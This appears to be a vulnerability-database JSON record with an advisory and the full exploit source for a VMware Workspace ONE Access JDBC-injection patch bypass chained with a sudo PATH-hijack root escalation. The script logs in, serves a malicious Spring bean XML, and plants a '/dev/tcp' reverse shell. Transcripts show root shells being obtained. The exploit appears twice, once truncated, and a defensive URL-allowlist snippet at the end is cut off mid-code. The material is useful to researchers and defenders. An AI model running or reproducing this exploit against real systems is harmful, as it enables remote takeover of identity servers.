> $FILENAME\r\necho 'bash' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\r\nhorizon@vidm [ /tmp ]$ ./lpe\r\n####### Checking for NTP server : lol ########\r\nroot [ /tmp ]# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]#\r\n```\r\n\r\n# Exploitation:\r\n\r\nTo bypass the patch, all I did was use the postgres driver for an attack, instead of MySQL. 
So it wasn't enough to remove the MySQL Driver and/or gadget chain within the code base.\r\n\r\n# Example:\r\n\r\n```\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py \r\n(+) usage: ./poc.py <target> <connectback[:port]> <user:pass>\r\n(+) eg: ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n(+) attacking target via the postgresql driver\r\n(+) rogue http server listening on 0.0.0.0:9090\r\n(+) starting handler on port 1234\r\n(+) logged in as admin\r\n(+) triggering jdbc attack...\r\n(+) connection from 192.168.2.97\r\n(+) pop thy shell!\r\nbash: cannot set terminal process group (1686): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\nroot [ /tmp ]# id\r\nid\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]# uname -a\r\nuname -a\r\nLinux vidm.localdomain 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux\r\nroot [ /tmp ]#\r\n```\r\n\"\"\"\r\nimport re\r\nimport sys\r\nimport socket\r\nimport requests\r\nfrom base64 import b64encode\r\nfrom telnetlib import Telnet\r\nfrom threading import Thread\r\nfrom colorama import Fore, Style, Back\r\nfrom random import getrandbits, choice\r\nfrom urllib3 import disable_warnings, exceptions\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\ndisable_warnings(exceptions.InsecureRequestWarning)\r\n\r\n# Stage 1: the Spring bean definition served as poc.xml; it runs the base64-decoded LPE script through /bin/bash -c as the horizon user.\r\nbeans = \"\"\"/bin/bash-c<![CDATA[echo {lpe}|base64 -d|bash]]>\"\"\"\r\n\r\n# Stage 2: the ntpServer.hzn PATH hijack from the LPE section, with the plain bash swapped for a reverse shell.\r\nlpe_payload = \"\"\"#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash -i >& /dev/tcp/{rhost}/{rport} 0>&1' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\"\"\"\r\n\r\nclass http_server(BaseHTTPRequestHandler):\r\n def log_message(self, format, *args):\r\n return\r\n def _set_response(self, d):\r\n self.send_response(200)\r\n self.send_header('Content-type', 
'text/xml')\r\n self.send_header('Content-Length', len(d))\r\n self.end_headers()\r\n def do_GET(self):\r\n # Only poc.xml is served: this is what the target fetches via socketFactoryArg.\r\n if self.path.endswith(\"poc.xml\"):\r\n lpe = lpe_payload.format(rhost=rhost, rport=rport)\r\n message = beans.format(lpe=b64encode(str.encode(lpe)).decode())\r\n self._set_response(message)\r\n self.wfile.write(message.encode('utf-8'))\r\n self.wfile.write('\\n'.encode('utf-8'))\r\n\r\ndef login(t, u, p):\r\n # Form login to the configurator (port 8443); the JSESSIONID cookie is the only state needed afterwards.\r\n d = {\r\n \"username\": u,\r\n \"password\": p\r\n }\r\n r = requests.post(\"https://%s:8443/cfg/j_security_check\" % t, data=d, verify=False, allow_redirects=False)\r\n assert r.headers['location'] != \"/cfg/login?failure=true\", \"(-) authentication failed, check your credentials\"\r\n assert \"JSESSIONID\" in r.headers['set-cookie'], \"(-) no jsessionid received, check your credentials\"\r\n m = re.search(\"JSESSIONID=(.{32});\", r.headers['set-cookie'])\r\n return m.group(1)\r\n\r\ndef get_tk(t, c):\r\n # The setup page embeds the CSRF token that /cfg/setup/test expects in the X-Vk header.\r\n r = requests.get(\"https://%s:8443/cfg/setup\" % t, cookies=c, verify=False)\r\n m = re.search(\"window.ec_wiz.vk = '(.*)';\", r.text)\r\n assert m, \"(-) cannot find csrf token!\"\r\n return m.group(1)\r\n\r\ndef trigger_jdbc(t, c, tk, uri):\r\n # Reaches ApplicationSetupController.dbTestConnection with the attacker-controlled jdbcurl.\r\n h = {\"X-Vk\" : tk}\r\n d = {\r\n \"jdbcurl\" : uri,\r\n \"dbUsername\": \"junk\",\r\n \"dbPassword\" : \"junk\",\r\n \"encryptConnection\": False # needed for \r\n }\r\n requests.post(\"https://%s:8443/cfg/setup/test\" % t, headers=h, data=d, cookies=c, verify=False)\r\n \r\ndef handler(lp):\r\n print(f\"(+) starting handler on port {lp}\")\r\n t = Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print(f\"(+) connection from {addr[0]}\")\r\n t.sock = conn\r\n print(f\"(+) {Fore.BLUE + Style.BRIGHT}pop thy shell!{Style.RESET_ALL}\")\r\n t.interact()\r\n\r\ndef main():\r\n global rhost, rport\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s <target> <connectback[:port]> <user:pass>\" % sys.argv[0])\r\n print(\"(+) eg: %s 192.168.2.97 192.168.2.234 
admin:Admin22#\" % sys.argv[0])\r\n sys.exit(1)\r\n assert \":\" in sys.argv[3], \"(-) credentials need to be in user:pass format\"\r\n target = sys.argv[1]\r\n rhost = sys.argv[2]\r\n rport = 1234\r\n http_port = 9090\r\n if \":\" in sys.argv[2]:\r\n rhost = sys.argv[2].split(\":\")[0]\r\n assert sys.argv[2].split(\":\")[1].isnumeric(), \"(-) connectback port must be a number!\"\r\n rport = int(sys.argv[2].split(\":\")[1])\r\n usr = sys.argv[3].split(\":\")[0]\r\n pwd = sys.argv[3].split(\":\")[1]\r\n # patch bypass for CVE-2022-22958: the PostgreSQL driver instantiates the socketFactory class with\r\n # socketFactoryArg as its String constructor argument, so FileSystemXmlApplicationContext loads our remote XML\r\n jdbc = f\"jdbc:postgresql://blah:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://{rhost}:9090/poc.xml\"\r\n cookie = { \"JSESSIONID\": login(target, usr, pwd) }\r\n tk = get_tk(target, cookie)\r\n server = HTTPServer(('0.0.0.0', http_port), http_server)\r\n handlerthr = Thread(target=server.serve_forever, args=[])\r\n handlerthr.daemon = True\r\n handlerthr.start()\r\n print(f\"(+) attacking target via the postgresql driver\")\r\n print(f\"(+) rogue http server listening on 0.0.0.0:{http_port}\")\r\n handlerthr = Thread(target=handler, args=[rport])\r\n handlerthr.start()\r\n print(\"(+) logged in as %s\" % usr)\r\n print(\"(+) triggering jdbc attack...\")\r\n trigger_jdbc(target, cookie, tk, jdbc)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://srcincite.io/pocs/cve-2022-{31664,31665}.py.txt"}, {"lastseen": "2022-08-11T21:13:10", "description": "**Vulnerability Details:**\n\nThis vulnerability allows local attackers to escalate privileges on affected installations of VMware Workspace ONE Access. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the ntpServer.hzn script. The issue results from the script invoking, as root via sudo, a program that does not exist on the system by bare name, which lets an attacker supply that program through PATH. 
An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.\n\n**Affected Vendors:**\n\nVMWare\n\n**Affected Products:**\n\nWorkspace ONE Access, Identity Manager, vRealize Automation\n\n**Vendor Response:**\n\nVMWare has issued an update to correct this vulnerability. More details can be found at: <https://www.vmware.com/security/advisories/VMSA-2022-0011.html>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0016 : VMware Workspace ONE Access ntpServer.hzn Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-4006", "CVE-2022-22958", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "SRC-2022-0016", "href": "https://srcincite.io/advisories/src-2022-0016/", "sourceData": "#!/usr/bin/env python3\r\n\"\"\"\r\nVMware Workspace ONE Access ApplicationSetupController dbTestConnection JDBC Injection Remote Code Execution Exploit\r\nSteven Seeley of Qihoo 360 Vulnerability Research Institute\r\n\r\n# Summary:\r\n\r\nThis vulnerability allows a remote attacker authenticated as admin to execute remote code as horizon. The attacker can chain this with another vulnerability to achieve code execution as root.\r\n\r\n# Notes:\r\n\r\nThis is a patch bypass for CVE-2022-22958 chained with a new LPE exploit. 
VMware has patched the bugs in this report and released an advisory here: https://www.vmware.com/security/advisories/VMSA-2022-0021.html.\r\n\r\n# Vulnerability Analysis:\r\n\r\n## ApplicationSetupController dbTestConnection JDBC Injection (CVE-2022-31665)\r\n\r\nInside of the com.vmware.horizon.svadmin.controller.ApplicationSetupController we can see the following code:\r\n\r\n```java\r\n/* */ public AjaxResponse dbTestConnection(@RequestParam(\"jdbcurl\") String jdbcUrl, @RequestParam(\"dbUsername\") String dbUsername, @RequestParam(\"dbPassword\") String dbPassword) { try {\r\n/* 65 */ validateDbFields(jdbcUrl, dbUsername, dbPassword);\r\n/* 66 */ } catch (AdminPortalException e) {\r\n/* 67 */ return new AjaxResponse(Messages.getMessage(e.getErrorId(), e.getArgs()), Integer.valueOf(1), false);\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 71 */ log.info(\"Testing database connection... jdbcUrl {}, dbUsername {}, passwordSet? {}\", new Object[] { jdbcUrl, dbUsername, \r\n/* 72 */ Boolean.valueOf(StringUtils.isNotBlank(dbPassword)) });\r\n/* 73 */ dbPassword = getDatabasePassword(dbPassword);\r\n/* 74 */ this.applicationSetupService.testDatabaseConnection(jdbcUrl, dbUsername, dbPassword); // 1 \r\n/* 75 */ } catch (AdminPortalException e) {\r\n/* 76 */ String error = null;\r\n/* 77 */ if (StringUtils.isNotBlank(e.getMessage())) {\r\n/* 78 */ error = this.applianceDiagnosticService.getLocalizedDBErrorMessages(e.getMessage());\r\n/* */ }\r\n/* */ \r\n/* 81 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testFailed\", new Object[] { error\r\n/* 82 */ }), Integer.valueOf(2), false);\r\n/* */ } \r\n/* 84 */ return new AjaxResponse(Messages.getMessage(\"configurator.configure.db.testSuccess\"), Integer.valueOf(0), true); }\r\n```\r\n\r\nAt [1] the code calls `ApplicationSetupService.testDatabaseConnection`\r\n\r\n```java\r\n/* */ public void testDatabaseConnection(@NotNull String jdbcUrl, @NotNull String dbUsername, @NotNull String dbPassword, 
boolean checkCreateTableAccess) throws AdminPortalException {\r\n/* */ String[] cmd;\r\n/* 210 */ log.debug(\"Testing db connection params jdbcUrl: {}\", jdbcUrl);\r\n/* */ \r\n/* 212 */ String encryptedPwd = this.configEncrypter.encrypt(dbPassword);\r\n/* */ \r\n/* */ \r\n/* 215 */ dbUsername = AppliancePasswordService.escapeArg(dbUsername);\r\n/* 216 */ jdbcUrl = AppliancePasswordService.escapeArg(jdbcUrl);\r\n/* */ \r\n/* 218 */ if (Const.isWindowsDeployment) {\r\n/* 219 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, \"\\\"\\\"\" + TEST_DB_CONNECTION_CMD + \"\\\"\" + \" \" + jdbcUrl + \" \" + dbUsername + \" \\\"\" + encryptedPwd + \"\\\" \" + checkCreateTableAccess + \"\\\"\" };\r\n/* */ } else {\r\n/* 221 */ cmd = new String[] { COMMAND_SHELL, COMMAND_SHELL_ARG, TEST_DB_CONNECTION_CMD + \" \" + jdbcUrl + \" \" + dbUsername + \" '\" + encryptedPwd + \"' \" + checkCreateTableAccess };\r\n/* */ } \r\n/* */ \r\n/* */ try {\r\n/* 225 */ CommandUtils.executeCommand(cmd); // 2\r\n/* 226 */ } catch (CommandException e) {\r\n/* 227 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 228 */ throw new AdminPortalException(StringUtils.removeStart(e.getStdOut(), \"ERROR:\").trim(), e);\r\n/* 229 */ } catch (IOException e) {\r\n/* 230 */ log.error(String.format(\"Error testing DB Connection with jdbc url: %s, user: %s.\", new Object[] { jdbcUrl, dbUsername }));\r\n/* 231 */ throw new AdminPortalException(e.getMessage(), e);\r\n/* */ } \r\n/* */ }\r\n```\r\n\r\nAt [2] the code executes the `/usr/local/horizon/bin/dbConnCheck` script which runs the following command. The `AppliancePasswordService.escapeArg` method is safe from injection attacks here (patch for CVE-2020-4006). 
Inside the script, we see the code drops privileges and calls `com.vmware.horizon.dbConnectionCheck.Main`:\r\n\r\n```sh\r\nif [[ $EUID -eq 0 ]]; then\r\n params=()\r\n for v in \"$@\" ; do\r\n params+=( $(escape \"$v\") )\r\n done\r\n su ${TOMCAT_USER} -c \"$JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main ${params[*]}\" 2>/dev/null\r\nelse\r\n $JAVACMD $HZN_TOOL_OPTS -cp ${BC_JAR}:${ADMIN_JAR} com.vmware.horizon.dbConnectionCheck.Main $@ 2>/dev/null\r\nfi\r\n```\r\n\r\nThe resultant command is:\r\n\r\n```\r\nsu horizon -c /usr/java/jre-vmware/bin/java -Dlog4j.configurationFile=file:/usr/local/horizon/conf/saas-log4j.properties -Dcatalina.base=/opt/vmware/horizon/workspace -Didm.fips.mode.required=true -Djava.security.properties=/opt/vmware/horizon/workspace/conf/idm_fips.security -Dorg.bouncycastle.fips.approved_only=true -cp /usr/local/horizon/jre-endorsed/bc-fips-1.0.1.BC-FIPS-Certified.jar:/usr/local/horizon/jars/dbConnection-0.1-jar-with-dependencies.jar com.vmware.horizon.dbConnectionCheck.Main <jdbcUrl> <dbUsername> '<encryptedPwd>' true 2>/dev/null\r\n```\r\n\r\nwhere `<jdbcUrl>` is controlled by the attacker and is passed, unchanged apart from shell escaping, to `DriverManager.getConnection`. An attacker can therefore supply a JDBC URI that selects the MySQL driver and trigger deserialization of untrusted data; the `CommonsBeanutils1` gadget from ysoserial works here and yields remote code execution as the horizon user (this was the original CVE-2022-22958 vector).\r\n\r\nBelow is the stack trace for the postgres-driver variant used in the patch bypass, starting from the `com.vmware.horizon.dbConnectionCheck.Main` class: `Main` hands the attacker's URI to `DriverManager`, the PostgreSQL driver instantiates the class named by `socketFactory` with `socketFactoryArg` as its String constructor argument, and `FileSystemXmlApplicationContext` fetches the remote bean definition, whose SpEL expression ends in `ProcessBuilder.start()` (see poc.png):\r\n\r\n```\r\nProcessBuilder.start() line: 1007 [local variables unavailable]\t\r\nNativeMethodAccessorImpl.invoke0(Method, Object, Object[]) line: not available [native method]\t\r\nNativeMethodAccessorImpl.invoke(Object, Object[]) line: 62\t\r\nDelegatingMethodAccessorImpl.invoke(Object, Object[]) line: 43\t\r\nMethod.invoke(Object, Object...) line: 498\t\r\nReflectiveMethodExecutor.execute(EvaluationContext, Object, Object...) 
line: 129\t\r\nMethodReference.getValueInternal(EvaluationContext, Object, TypeDescriptor, Object[]) line: 139\t\r\nMethodReference.access$000(MethodReference, EvaluationContext, Object, TypeDescriptor, Object[]) line: 55\t\r\nMethodReference$MethodValueRef.getValue() line: 387\t\r\nCompoundExpression.getValueInternal(ExpressionState) line: 92\t\r\nCompoundExpression(SpelNodeImpl).getValue(ExpressionState) line: 112\t\r\nSpelExpression.getValue(EvaluationContext) line: 272\t\r\nStandardBeanExpressionResolver.evaluate(String, BeanExpressionContext) line: 166\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).evaluateBeanDefinitionString(String, BeanDefinition) line: 1575\t\r\nBeanDefinitionValueResolver.doEvaluate(String) line: 280\t\r\nBeanDefinitionValueResolver.evaluate(TypedStringValue) line: 237\t\r\nBeanDefinitionValueResolver.resolveValueIfNecessary(Object, Object) line: 205\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).applyPropertyValues(String, BeanDefinition, BeanWrapper, PropertyValues) line: 1702\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).populateBean(String, RootBeanDefinition, BeanWrapper) line: 1447\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).doCreateBean(String, RootBeanDefinition, Object[]) line: 593\t\r\nDefaultListableBeanFactory(AbstractAutowireCapableBeanFactory).createBean(String, RootBeanDefinition, Object[]) line: 516\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).lambda$doGetBean$0(String, RootBeanDefinition, Object[]) line: 324\t\r\n761923430.getObject() line: not available\t\r\nDefaultListableBeanFactory(DefaultSingletonBeanRegistry).getSingleton(String, ObjectFactory>) line: 234\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).doGetBean(String, Class, Object[], boolean) line: 322\t\r\nDefaultListableBeanFactory(AbstractBeanFactory).getBean(String) line: 202\t\r\nDefaultListableBeanFactory.preInstantiateSingletons() line: 
897\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).finishBeanFactoryInitialization(ConfigurableListableBeanFactory) line: 879\t\r\nFileSystemXmlApplicationContext(AbstractApplicationContext).refresh() line: 551\t\r\nFileSystemXmlApplicationContext.(String[], boolean, ApplicationContext) line: 142\t\r\nFileSystemXmlApplicationContext.(String) line: 85\t\r\nNativeConstructorAccessorImpl.newInstance0(Constructor>, Object[]) line: not available [native method]\t\r\nNativeConstructorAccessorImpl.newInstance(Object[]) line: 62\t\r\nDelegatingConstructorAccessorImpl.newInstance(Object[]) line: 45\t\r\nConstructor.newInstance(Object...) line: 423\t\r\nObjectFactory.instantiate(String, Properties, boolean, String) line: 62\t\r\nSocketFactoryFactory.getSocketFactory(Properties) line: 39\t\r\nConnectionFactoryImpl.openConnectionImpl(HostSpec[], String, String, Properties) line: 182\t\r\nConnectionFactory.openConnection(HostSpec[], String, String, Properties) line: 51\t\r\nPgConnection.(HostSpec[], String, String, Properties, String) line: 223\t\r\nDriver.makeConnection(String, Properties) line: 465\t\r\nDriver.connect(String, Properties) line: 264\t\r\nDriverManager.getConnection(String, Properties, Class>) line: 664\t\r\nDriverManager.getConnection(String, String, String) line: 247\t\r\nDbConnectionCheckServiceImpl$FactoryHelper.getConnection(String, String, String) line: 444\t\r\nDbConnectionCheckServiceImpl.testConnection(String, String, String, boolean) line: 141\t\r\nDbConnectionCheckServiceImpl.checkConnection(String, String, String, boolean) line: 95\t\r\nMain.main(String[]) line: 61\t\r\n```\r\n\r\n## ntpServer.hzn Privilege Escalation Vulnerability (CVE-2022-31664)\r\n\r\nInside of the /etc/sudoers file we see:\r\n\r\n```\r\n...\r\nhorizon ALL = NOPASSWD: /usr/local/horizon/scripts/horizonService.sh, \\\r\n...\r\n/usr/local/horizon/scripts/ntpServer.hzn, \\\r\n...\r\n```\r\n\r\nThis means we can execute the /usr/local/horizon/scripts/ntpServer.hzn 
script as root. Studying this file we find:\r\n\r\n```\r\n...\r\nfunction check_ntp_server() {\r\n # check connectivity to the given ntp server\r\n NTP_SERVER=$1\r\n for i in $(echo $NTP_SERVER | tr \",\" \"\\n\")\r\n do\r\n echo \"####### Checking for NTP server : $i ########\"\r\n sntp $i // 2\r\n echo \"##############################################################\"\r\n echo \" \"\r\n done\r\n}\r\n...\r\ncase \"$1\" in\r\n --get)\r\n get_ntp_server\r\n ;;\r\n --check)\r\n if [ -z \"$2\" ]\r\n then\r\n usage\r\n fi\r\n check_ntp_server $2 // 1\r\n```\r\n\r\nThis code calls `check_ntp_server` at [1], which at [2] runs `sntp` by bare name, so which file gets executed is decided entirely by PATH. The problem is that no such binary exists anywhere on the appliance:\r\n\r\n```\r\nroot@vidm [ /home/sshuser ]# find / -type f -name \"sntp\"\r\nroot@vidm [ /home/sshuser ]#\r\n```\r\n\r\nSo an attacker running as horizon can prepend a writable directory to PATH, create an executable named sntp there and invoke the script through sudo. This works because sudo on the appliance does not pin PATH with `secure_path`, so the caller's PATH is what root uses to resolve `sntp`:\r\n\r\n```\r\nhorizon@vidm [ /tmp ]$ cat lpe\r\n#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\r\nhorizon@vidm [ /tmp ]$ ./lpe\r\n####### Checking for NTP server : lol ########\r\nroot [ /tmp ]# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]#\r\n```\r\n\r\n# Exploitation:\r\n\r\nTo bypass the patch, all I did was use the postgres driver for the attack instead of MySQL. 
So it wasn't enough to remove the MySQL Driver and/or gadget chain within the code base.\r\n\r\n# Example:\r\n\r\n```\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py \r\n(+) usage: ./poc.py <target> <connectback[:port]> <user:pass>\r\n(+) eg: ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n\r\nresearcher@mars:~/research/vidm/patch-bypass$ ./poc.py 192.168.2.97 192.168.2.234 admin:Admin22#\r\n(+) attacking target via the postgresql driver\r\n(+) rogue http server listening on 0.0.0.0:9090\r\n(+) starting handler on port 1234\r\n(+) logged in as admin\r\n(+) triggering jdbc attack...\r\n(+) connection from 192.168.2.97\r\n(+) pop thy shell!\r\nbash: cannot set terminal process group (1686): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\nroot [ /tmp ]# id\r\nid\r\nuid=0(root) gid=0(root) groups=0(root),1000(vami),1004(sshaccess)\r\nroot [ /tmp ]# uname -a\r\nuname -a\r\nLinux vidm.localdomain 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux\r\nroot [ /tmp ]#\r\n```\r\n\"\"\"\r\nimport re\r\nimport sys\r\nimport socket\r\nimport requests\r\nfrom base64 import b64encode\r\nfrom telnetlib import Telnet\r\nfrom threading import Thread\r\nfrom colorama import Fore, Style, Back\r\nfrom random import getrandbits, choice\r\nfrom urllib3 import disable_warnings, exceptions\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\ndisable_warnings(exceptions.InsecureRequestWarning)\r\n\r\n# Stage 1: the Spring bean definition served as poc.xml; it runs the base64-decoded LPE script through /bin/bash -c as the horizon user.\r\nbeans = \"\"\"/bin/bash-c<![CDATA[echo {lpe}|base64 -d|bash]]>\"\"\"\r\n\r\n# Stage 2: the ntpServer.hzn PATH hijack from the LPE section, with the plain bash swapped for a reverse shell.\r\nlpe_payload = \"\"\"#!/bin/bash\r\nFILENAME=sntp\r\nrm -rf $FILENAME\r\ncd /tmp\r\necho '#!/bin/bash' > $FILENAME\r\necho 'bash -i >& /dev/tcp/{rhost}/{rport} 0>&1' >> $FILENAME\r\nchmod 777 $FILENAME\r\nPATH=\".:$PATH\" sudo /usr/local/horizon/scripts/ntpServer.hzn --check lol\"\"\"\r\n\r\nclass http_server(BaseHTTPRequestHandler):\r\n def log_message(self, format, *args):\r\n return\r\n def _set_response(self, d):\r\n self.send_response(200)\r\n self.send_header('Content-type', 
'text/xml')\r\n self.send_header('Content-Length', len(d))\r\n self.end_headers()\r\n def do_GET(self):\r\n # Only poc.xml is served: this is what the target fetches via socketFactoryArg.\r\n if self.path.endswith(\"poc.xml\"):\r\n lpe = lpe_payload.format(rhost=rhost, rport=rport)\r\n message = beans.format(lpe=b64encode(str.encode(lpe)).decode())\r\n self._set_response(message)\r\n self.wfile.write(message.encode('utf-8'))\r\n self.wfile.write('\\n'.encode('utf-8'))\r\n\r\ndef login(t, u, p):\r\n # Form login to the configurator (port 8443); the JSESSIONID cookie is the only state needed afterwards.\r\n d = {\r\n \"username\": u,\r\n \"password\": p\r\n }\r\n r = requests.post(\"https://%s:8443/cfg/j_security_check\" % t, data=d, verify=False, allow_redirects=False)\r\n assert r.headers['location'] != \"/cfg/login?failure=true\", \"(-) authentication failed, check your credentials\"\r\n assert \"JSESSIONID\" in r.headers['set-cookie'], \"(-) no jsessionid received, check your credentials\"\r\n m = re.search(\"JSESSIONID=(.{32});\", r.headers['set-cookie'])\r\n return m.group(1)\r\n\r\ndef get_tk(t, c):\r\n # The setup page embeds the CSRF token that /cfg/setup/test expects in the X-Vk header.\r\n r = requests.get(\"https://%s:8443/cfg/setup\" % t, cookies=c, verify=False)\r\n m = re.search(\"window.ec_wiz.vk = '(.*)';\", r.text)\r\n assert m, \"(-) cannot find csrf token!\"\r\n return m.group(1)\r\n\r\ndef trigger_jdbc(t, c, tk, uri):\r\n # Reaches ApplicationSetupController.dbTestConnection with the attacker-controlled jdbcurl.\r\n h = {\"X-Vk\" : tk}\r\n d = {\r\n \"jdbcurl\" : uri,\r\n \"dbUsername\": \"junk\",\r\n \"dbPassword\" : \"junk\",\r\n \"encryptConnection\": False # needed for \r\n }\r\n requests.post(\"https://%s:8443/cfg/setup/test\" % t, headers=h, data=d, cookies=c, verify=False)\r\n \r\ndef handler(lp):\r\n print(f\"(+) starting handler on port {lp}\")\r\n t = Telnet()\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((\"0.0.0.0\", lp))\r\n s.listen(1)\r\n conn, addr = s.accept()\r\n print(f\"(+) connection from {addr[0]}\")\r\n t.sock = conn\r\n print(f\"(+) {Fore.BLUE + Style.BRIGHT}pop thy shell!{Style.RESET_ALL}\")\r\n t.interact()\r\n\r\ndef main():\r\n global rhost, rport\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s <target> <connectback[:port]> <user:pass>\" % sys.argv[0])\r\n print(\"(+) eg: %s 192.168.2.97 192.168.2.234 
admin:Admin22#\" % sys.argv[0])\r\n sys.exit(1)\r\n assert \":\" in sys.argv[3], \"(-) credentials need to be in user:pass format\"\r\n target = sys.argv[1]\r\n rhost = sys.argv[2]\r\n rport = 1234\r\n http_port = 9090\r\n if \":\" in sys.argv[2]:\r\n rhost = sys.argv[2].split(\":\")[0]\r\n assert sys.argv[2].split(\":\")[1].isnumeric(), \"(-) connectback port must be a number!\"\r\n rport = int(sys.argv[2].split(\":\")[1])\r\n usr = sys.argv[3].split(\":\")[0]\r\n pwd = sys.argv[3].split(\":\")[1]\r\n # patch bypass for CVE-2022-22958\r\n jdbc = f\"jdbc:postgresql://blah:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://{rhost}:9090/poc.xml\"\r\n cookie = { \"JSESSIONID\": login(target, usr, pwd) }\r\n tk = get_tk(target, cookie)\r\n server = HTTPServer(('0.0.0.0', http_port), http_server)\r\n handlerthr = Thread(target=server.serve_forever, args=[])\r\n handlerthr.daemon = True\r\n handlerthr.start()\r\n print(f\"(+) attacking target via the postgresql driver\")\r\n print(f\"(+) rogue http server listening on 0.0.0.0:{http_port}\")\r\n handlerthr = Thread(target=handler, args=[rport])\r\n handlerthr.start()\r\n print(\"(+) logged in as %s\" % usr)\r\n print(\"(+) triggering jdbc attack...\")\r\n trigger_jdbc(target, cookie, tk, jdbc)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://srcincite.io/pocs/cve-2022-{31664,31665}.py.txt"}]}
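The JDBC injection above (CVE-2022-31665 and its predecessor CVE-2022-22958) exists because `dbTestConnection` passes a caller-supplied JDBC URL to the driver after shell escaping only; removing one driver or one gadget chain did not help because every JDBC driver exposes URL properties that load classes, files or URLs. The following is an added example, not VMware's code or patch, of the allowlist check that belongs in front of `DriverManager.getConnection`: it accepts only the expected subprotocols, a database host from an operator-maintained list (`ALLOWED_DB_HOSTS` here is an assumed value), a plain database name, and a short allowlist of connection properties, so `socketFactory`, `socketFactoryArg` and the MySQL deserialization knobs are refused whether or not they are on the deny list that only sharpens the error text. The sample URLs are constructed; `EXPLOIT_URL` mirrors the PoC's URL with the host swapped for an allowlisted one so that the property check, not the host check, is what fires.

```python
"""
Allowlist validation for a caller-supplied JDBC URL, the check the
dbTestConnection flow lacks before the URL reaches DriverManager.getConnection().
Added example, not VMware's code or patch. Assumptions: PostgreSQL and MySQL are
the only legitimate backends, the DB host must be on an operator-maintained list
(ALLOWED_DB_HOSTS is made up) and a connectivity test needs only SAFE_PROPERTIES.
"""
import re
from urllib.parse import parse_qsl, urlsplit

ALLOWED_SUBPROTOCOLS = {"postgresql", "mysql"}
ALLOWED_DB_HOSTS = {"db.internal"}  # assumed: the appliance's real database host(s)

# Connection properties a connectivity test may carry. Everything else is refused,
# so a new driver feature stays off until someone adds it here deliberately.
SAFE_PROPERTIES = {"ssl", "sslmode", "connectTimeout", "loginTimeout", "ApplicationName"}

# Properties whose value names a class, file or URL the driver will load
# (pgjdbc and Connector/J names). The allowlist already rejects them; this
# set only makes the rejection reason explicit.
CODE_LOADING_PROPERTIES = {
    "postgresql": {"socketFactory", "socketFactoryArg", "sslfactory",
                   "sslfactoryarg", "loggerFile"},
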